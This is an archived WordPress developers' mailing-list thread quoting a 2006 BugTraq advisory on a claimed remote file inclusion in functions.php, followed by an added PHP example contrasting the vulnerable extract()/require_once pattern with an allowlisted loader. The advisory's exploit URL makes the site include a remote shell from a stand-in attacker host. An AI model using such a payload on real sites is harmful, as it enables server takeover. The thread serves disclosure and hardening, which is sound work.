[wp-hackers] Wordpress File Inclusion
Aaron Brazell
emmensetech at gmail.com
Mon Nov 13 17:44:41 GMT 2006
It's been sent to security. Probably not a good idea to hit the list
with one of these as it's public and may cause an unnecessary stir.
--
Aaron Brazell
Technology Architect, b5media
“A Global New Media Company”
web:: www.b5media.com, www.technosailor.com
phone:: 410-608-6620
skype:: technosailor
On Nov 13, 2006, at 12:38 PM, Bas Bosman wrote:
> Has anybody seen this post on the BugTraq mailing list?
> (Also on: http://www.securityfocus.com/archive/1/451311/30/0/threaded)
>
> I'm at work and don't have access to my Wordpress test box, so I
> haven't verified it yet.
>
> Kind regards,
> Bas Bosman (Nazgul)
>
>
> ---------------------------- Original Message ----------------------------
> Subject: Wordpress File Inclusion
> From: vannovax at gmail.com
> Date: Sat, November 11, 2006 3:18
> To: bugtraq at securityfocus.com
> --------------------------------------------------------------------------
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> WordPress Remote File Inclusion
> Download: http://wordpress.org/latest.zip
> Found by _ANtrAX_ http://foro.c-group.org
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Vulnerable Code:
> {
> global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query, $wp_rewrite, $wpdb;
>
> extract($wp_query->query_vars);
>
> require_once($file);
> }
> .....
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Affected File:
> /wp-includes/functions.php =]
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Vulnerability:
> www.site.com/wp-includes/functions.php?file=http://evil.com/shell.txt?
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Greetz:V4MP1R3Z4, FRE4K , PENNISSMEN ,EL GROXO , DEYABU ROOLZ ,
> MATASANOS,C-GROUP STAFF . CHAPINHACK, SysRoot ¬¬
>
>
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
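For reference, the pattern the quoted advisory describes, written out as an added example (this is not WordPress code and not code from anyone in this thread): a request variable pulled into the local scope by extract() and handed straight to require_once(), beside a hardened loader that maps a short name through a fixed allowlist and never includes a user-supplied path. The function names, the template directory and the allowlist are hypothetical.

```php
<?php
// Added example (not WordPress code). Shows the extract()/require_once()
// pattern from the advisory and one way to harden it.

// VULNERABLE: extract() turns every query variable into a local variable, so a
// request carrying ?file=... defines $file, and require_once() then includes
// whatever path or URL the request named (a remote include if allow_url_include
// is enabled, a local file include otherwise).
function load_template_vulnerable(array $query_vars)
{
    extract($query_vars);   // $file now comes straight from the request
    require_once($file);    // no check that $file is a known template
}

// HARDENED: request data never chooses an include path directly. A short name
// is looked up in a fixed map of files under one known directory; anything
// not in the map falls back to the default, and a realpath() prefix check
// rejects any resolved path that lands outside that directory.
const TEMPLATE_DIR = __DIR__ . '/templates';   // hypothetical directory
const TEMPLATES = [                            // hypothetical allowlist
    'index'   => 'index.php',
    'single'  => 'single.php',
    'archive' => 'archive.php',
];

function load_template_hardened(array $query_vars): string
{
    $name = isset($query_vars['template']) ? (string) $query_vars['template'] : 'index';
    if (!array_key_exists($name, TEMPLATES)) {
        $name = 'index';   // unknown names are never used as a path
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . TEMPLATES[$name]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('template missing or outside ' . TEMPLATE_DIR);
    }
    require_once $path;
    return $path;
}

// Constructed request for illustration: the ?file= parameter from the advisory
// is simply ignored, because only the allowlisted 'template' key is consulted.
$constructed_query_vars = ['file' => 'http://example.invalid/shell.txt', 'template' => 'single'];
try {
    echo 'included ', load_template_hardened($constructed_query_vars), PHP_EOL;
} catch (RuntimeException $e) {
    echo 'refused: ', $e->getMessage(), PHP_EOL;   // e.g. when templates/ is absent
}
```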